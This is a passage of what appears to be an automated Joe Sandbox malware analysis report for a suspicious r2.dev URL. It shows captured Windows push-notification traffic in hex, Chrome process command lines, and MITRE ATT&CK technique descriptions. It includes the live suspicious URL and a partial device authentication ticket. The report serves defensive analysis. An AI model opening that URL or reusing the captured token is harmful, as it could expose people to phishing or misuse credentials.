2025-01-14 00:39:21 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:39:21 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 67 51 77 54 33 48 74 65 33 30 32 66 57 54 59 6a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 61 65 36 63 30 32 66 66 64 31 39 38 33 30 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 6c 77 42 64 4a 32 77 51 54 34 76 46 62 39 52 54 43 75 45 4f 71 4b 48 4e 54 76 6a 4e 32 73 43 72 30 4d 5a 48 4e 44 42 64 63 67 52 6a 76 74 58 44 46 34 61 6e 76 4b 48 59 72 68 7a 45 2b 49 4d 52 36 68 66 30 48 6d 34 6e 38 38 5a 71 33 64 37 31 4a 71 4a 67 4b 66 65 72 70 49 51 31 70 69 44 44 39 6d 74 2b 7a 68 71 4f 5a 6f 52 54 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: gQwT3Hte302fWTYj.2Context: 7ae6c02ffd198303<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXlwBdJ2wQT4vFb9RTCuEOqKHNTvjN2sCr0MZHNDBdcgRjvtXDF4anvKHYrhzE+IMR6hf0Hm4n88Zq3d71JqJgKferpIQ1piDD9mt+zhqOZoRT
2025-01-14 00:39:21 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 67 51 77 54 33 48 74 65 33 30 32 66 57 54 59 6a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 61 65 36 63 30 32 66 66 64 31 39 38 33 30 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: gQwT3Hte302fWTYj.3Context: 7ae6c02ffd198303<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 00:39:21 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:39:21 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 48 44 72 6c 71 76 42 71 53 55 79 4c 50 62 53 36 2b 67 63 72 57 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: HDrlqvBqSUyLPbS6+gcrWw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.6	50003	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:39:47 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 47 32 57 50 44 63 47 79 67 30 4b 77 37 39 71 39 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 30 31 64 33 64 31 66 64 39 37 66 31 39 63 39 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: G2WPDcGyg0Kw79q9.1Context: 601d3d1fd97f19c9
2025-01-14 00:39:47 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:39:47 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 47 32 57 50 44 63 47 79 67 30 4b 77 37 39 71 39 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 30 31 64 33 64 31 66 64 39 37 66 31 39 63 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 6c 77 42 64 4a 32 77 51 54 34 76 46 62 39 52 54 43 75 45 4f 71 4b 48 4e 54 76 6a 4e 32 73 43 72 30 4d 5a 48 4e 44 42 64 63 67 52 6a 76 74 58 44 46 34 61 6e 76 4b 48 59 72 68 7a 45 2b 49 4d 52 36 68 66 30 48 6d 34 6e 38 38 5a 71 33 64 37 31 4a 71 4a 67 4b 66 65 72 70 49 51 31 70 69 44 44 39 6d 74 2b 7a 68 71 4f 5a 6f 52 54 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: G2WPDcGyg0Kw79q9.2Context: 601d3d1fd97f19c9<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXlwBdJ2wQT4vFb9RTCuEOqKHNTvjN2sCr0MZHNDBdcgRjvtXDF4anvKHYrhzE+IMR6hf0Hm4n88Zq3d71JqJgKferpIQ1piDD9mt+zhqOZoRT
2025-01-14 00:39:47 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 47 32 57 50 44 63 47 79 67 30 4b 77 37 39 71 39 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 30 31 64 33 64 31 66 64 39 37 66 31 39 63 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: G2WPDcGyg0Kw79q9.3Context: 601d3d1fd97f19c9<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 00:39:47 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:39:47 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 38 48 59 38 5a 58 33 33 47 55 43 61 32 74 36 4b 33 2b 36 6e 49 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 8HY8ZX33GUCa2t6K3+6nIQ.0Payload parsing failed.

Target ID:	1
Start time:	19:38:47
Start date:	13/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	19:38:51
Start date:	13/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2220,i,11269688216620596716,9468620323814260780,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	19:38:57
Start date:	13/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 43

Chrome Cache Entry: 44

Chrome Cache Entry: 45

Chrome Cache Entry: 46

Chrome Cache Entry: 47

Chrome Cache Entry: 48

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 2100, Parent PID: 3512

General

Chronological Activities

Windows Analysis Report
http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e